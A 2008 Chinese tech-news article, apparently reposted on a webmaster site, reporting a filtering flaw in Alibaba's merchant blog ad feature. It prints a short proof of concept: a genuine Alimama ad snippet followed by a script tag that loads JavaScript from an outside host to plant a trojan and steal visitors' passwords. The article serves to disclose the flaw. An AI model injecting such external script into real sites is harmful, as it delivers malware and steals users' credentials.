• --:)欢迎访问锋网源码(:--
  • 首页
  • RSS订阅
  • 常用软件
  • 网页模板
  • 网站运作
  • 锋网学院
  • 繁體中文

  • 学院首页
  • 新闻资讯
  • 网站运营
  • 网站开发
  • 美工设计
  • 数据库类
  • 服务器类
  • 网络应用
  • 操作系统
  • 软件教学
编程开发   认证考试   网络安全   文章搜索: 高级搜索
会员登录/控制面版 您的位置: 学院首页 >> 网站运营 >> 站长新闻 >> 文章内容
 

精彩推荐

 
 

本类推荐文章

 
 

本类阅读排行

  • “一次编写 到处运行” Sun编..
  • 我是怎么白手起家赚到100万的..
  • 做好站长基石,一个小说网站..
  • 迅雷以色情加盗版的模式赢利..
  • 我的与它的故事,我是如何白手..
  • 用行动支持奥运 搜狐、新浪、..
  • 微软学生中心提供正版软件下..
  • 中国大陆TOP100网站人气榜--..
  • "站长版"遨游浏览器,不骂你都..
  • 网络创业成功案例:张家界旅..
  • wap站长大全
  • 不靠GG靠做站 大学生养老婆
  • 汶川地震:一位拾荒老人捐了..
  • 一个网站CEO的现实生活
  • DEDECMS系统IT柏拉图的讲课内..
  • 报刊投稿地址
  • 残疾人创残疾人交友网站 为同..
  • 快典网又出新品 - 成语词典
  • 网络红娘小龙女聊婚恋交友网..
  • 口碑网推出新版 分类信息向专..
 
 

阿里巴巴网商博客现漏洞 可插入恶意代码

  • 日期:2008-08-01     人气:     出处:     作者:
  • 字体大小:
  • 小
  • 中
  • 大

  据国内安全组织“安全警戒线”检测,阿里巴巴网商博客出现漏洞,由于过滤不严,不法黑客或可能通过加载JS代码形式进行挂马,从而盗窃访问者相关财产密码或引发跨站攻击。具体情况如下:

  文章作者:攻击者

  信息来源:安全警戒线

  文章备注:已经给马云发E-MAIL

  在阿里巴巴网商博客中允许我们填加阿里妈妈的广告,但是他却没有过滤掉除了阿里妈妈以外的地址,从而可以使用JS挂马,简单的不能在简单的利用方法:

<script type="text/JavaScript">
alimama_pid="mm_10031051_1309365_2877941";
alimama_titlecolor="0000FF";
alimama_descolor ="000000";
alimama_bgcolor="FFFFFF";
alimama_bordercolor="E6E6E6";
alimama_linkcolor="008000";
alimama_bottomcolor="FFFFFF";
alimama_anglesize="0";
alimama_bgpic="0";
alimama_icon="0";
alimama_sizecode="22";
alimama_width=120;
alimama_height=240;
alimama_type=2;
</script>
<script src="http://a.alimama.cn/js.js" type=text/javascript></script>
<script src="http://www.winshell.cn/js.js" type=text/javascript></script>

相关文章
相关软件

  • 网友评论:
  • 查看所有评论
  • 我要发表评论
 

关于本站 | 广告联系 | 版权声明 | 网站地图 | 加入收藏 | 帮助中心 |

Copyright © 2006-2007 fwvv.net  程序支持:木翼  皖ICP备06004916号